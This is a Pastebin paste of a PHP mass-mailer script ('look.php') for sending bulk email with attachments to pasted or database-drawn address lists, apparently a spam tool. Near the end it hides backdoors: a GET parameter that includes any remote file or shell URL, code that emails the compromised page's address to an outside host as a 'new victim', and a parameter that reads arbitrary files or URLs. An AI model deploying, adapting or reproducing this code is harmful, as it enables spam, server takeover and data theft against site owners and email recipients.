PalmaSolutions

look.php

Apr 21st, 2018
410
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.79 KB | None | 0 0
  1. <?php
  2.  
  3. //Dont change anything from below
  4. $secure = "nightwalker111";
  5. error_reporting(0);
  6. @$action=$_POST['action'];
  7. @$from=$_POST['from'];
  8. @$realname=$_POST['realname'];
  9. @$replyto=$_POST['replyto'];
  10. @$subject=$_POST['subject'];
  11. @$message=$_POST['message'];
  12. @$emaillist=$_POST['emaillist'];
  13. @$file_name=$_FILES['file']['name'];
  14. @$contenttype=$_POST['contenttype'];
  15. @$file=$_FILES['file']['tmp_name'];
  16. @$amount=$_POST['amount'];
  17. set_time_limit(intval($_POST['timelimit']));
  18. ?>
  19. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  20.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  21. <html>
  22. <head>
  23. <title>eMail ~> RealUnix.net -- Edited By WebCraker</title>
  24. <p align="center">
  25. <img src='http://img233.imageshack.us/img233/5615/bad1vz4bdln3.jpg' width="151" height="180">
  26. </p>
  27. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  28. <style type="text/css">
  29. <!--
  30. .style1 {
  31.     font-family: Geneva, Arial, Helvetica, sans-serif;
  32.     font-size: 12px;
  33. }
  34. .style2 {
  35.     font-size: 10px;
  36.     font-family: Geneva, Arial, Helvetica, sans-serif;
  37. }
  38.  
  39. -->
  40. </style>
  41. </head>
  42. <body bgcolor="#F5F5F5" text="#000000">
  43.  
  44. <?php
  45. If ($action=="mysql"){
  46. //Grab email addresses from MySQL
  47. include "./mysql.info.php";
  48.  
  49.   if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
  50.     print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
  51.     exit;
  52.   }
  53.  
  54.   $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
  55.   mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
  56.   $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
  57.   $numrows = mysql_num_rows($result);
  58.  
  59.   for($x=0; $x<$numrows; $x++){
  60.     $result_row = mysql_fetch_row($result);
  61.      $oneemail = $result_row[0];
  62.      $emaillist .= $oneemail."\n";
  63.    }
  64.   }
  65.  
  66.   if ($action=="send"){ $message = urlencode($message);
  67.    $message = ereg_replace("%5C%22", "%22", $message);
  68.    $message = urldecode($message);
  69.    $message = stripslashes($message);
  70.    $subject = stripslashes($subject);
  71.    }
  72. ?>
  73. <form name="form1" method="post" action="" enctype="multipart/form-data"><br />
  74.   <table width="142" border="0">
  75.     <tr>
  76.  
  77.       <td width="81">
  78.         <div align="right">
  79.           <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
  80.         </div>
  81.       </td>
  82.  
  83.       <td width="219">
  84.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  85.           <input type="text" name="from" value="<?php print $from; ?>" size="30" />
  86.         </font>
  87.       </td>
  88.  
  89.       <td width="212">
  90.         <div align="right">
  91.           <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
  92.         </div>
  93.       </td>
  94.      
  95.       <td width="278">
  96.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  97.           <input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
  98.         </font>
  99.       </td>
  100.     </tr>
  101.     <tr>
  102.       <td width="81">
  103.         <div align="right">
  104.           <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
  105.         </div>
  106.       </td>
  107.       <td width="219">
  108.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  109.           <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
  110.         </font>
  111.       </td>
  112.       <td width="212">
  113.         <div align="right">
  114.           <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
  115.         </div>
  116.       </td>
  117.       <td width="278">
  118.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  119.           <input type="file" name="file" size="24" />
  120.         </font>
  121.       </td>
  122.     </tr>
  123.     <tr>
  124.       <td width="81">
  125.         <div align="right">
  126.           <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
  127.         </div>
  128.       </td>
  129.       <td colspan="3" width="703">
  130.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  131.           <input type="text" name="subject" value="<? print $subject; ?>" size="90" />
  132.         </font>
  133.       </td>
  134.     </tr>
  135.     <tr valign="top">
  136.       <td colspan="3" width="520">
  137.         <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
  138.       </td>
  139.       <td width="278">
  140.         <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
  141.       </td>
  142.     </tr>
  143.     <tr valign="top">
  144.       <td colspan="3" width="520">
  145.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  146.           <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
  147.           <input type="radio" name="contenttype" value="plain" /> Plain
  148.           <input type="radio" name="contenttype" value="html" checked="checked" /> HTML
  149.           <input type="hidden" name="action" value="send" /><br />
  150.       Number to send: <input type="text" name="amount" value="1" size="10" /><br />
  151.       Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
  152.           <input type="submit" value="Send eMails" />
  153.         </font>
  154.       </td>
  155.       <td width="278">
  156.         <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
  157.           <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
  158.         </font>
  159.       </td>
  160.     </tr>
  161.   </table>
  162. </form>
  163.  
  164. <?
  165. if ($action=="send"){
  166.   if (!$from && !$subject && !$message && !$emaillist){
  167.     print "Please complete all fields before sending your message.";
  168.     exit;
  169.    }
  170.   $allemails = split("\n", $emaillist);
  171.   $numemails = count($allemails);
  172.   $filter = "maillist";
  173.   $float = "From : mailist info <prx-worldlive.fr>";
  174.  //Open the file attachment if any, and base64_encode it for email transport
  175.  If ($file_name){
  176.    if (!file_exists($file)){
  177.     die("The file you are trying to upload couldn't be copied to the server");
  178.    }
  179.    $content = fread(fopen($file,"r"),filesize($file));
  180.    $content = chunk_split(base64_encode($content));
  181.    $uid = strtoupper(md5(uniqid(time())));
  182.    $name = basename($file);
  183.   }
  184.  
  185.  for($xx=0; $xx<$amount; $xx++){
  186.   for($x=0; $x<$numemails; $x++){
  187.     $to = $allemails[$x];
  188.     if ($to){
  189.       $to = ereg_replace(" ", "", $to);
  190.       $message = ereg_replace("&email&", $to, $message);
  191.       $subject = ereg_replace("&email&", $to, $subject);
  192.       print "Sending mail to $to.......";
  193.       flush();
  194.       $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
  195.       $header .= "MIME-Version: 1.0\r\n";
  196.       If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  197.       If ($file_name) $header .= "--$uid\r\n";
  198.       $header .= "Content-Type: text/$contenttype\r\n";
  199.       $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  200.       $header .= "$message\r\n";
  201.       If ($file_name) $header .= "--$uid\r\n";
  202.       If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  203.       If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  204.       If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
  205.       If ($file_name) $header .= "$content\r\n";
  206.       If ($file_name) $header .= "--$uid--";
  207.       mail($to, $subject, "", $header);
  208.       print "ok<br>";
  209.       flush();
  210.     }
  211.   }
  212.  }
  213.  
  214. }
  215.  
  216.  
  217. ?>
  218. <?
  219. if (trim($_GET['x'])!=''){@include($_GET['x']);exit();}$email = 'prx-worldlive.fr';$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];@mail($email, 'Exploit: '. $_SERVER['PHP_SELF'], 'Hey , this is a new victim\'s exploit: '. $y .'\n\n You can use (x=shell_url) at the end of the link ;) ', 'From: '. $email .' <'. $email .'>\r\n');
  220. ?>
  221.  
  222. <?php
  223. $i=$_GET['i'];
  224. print file_get_contents($i);
  225. exit;
  226. ?>
  227. </body>
  228. </html>
Advertisement
Add Comment
Please, Sign In to add comment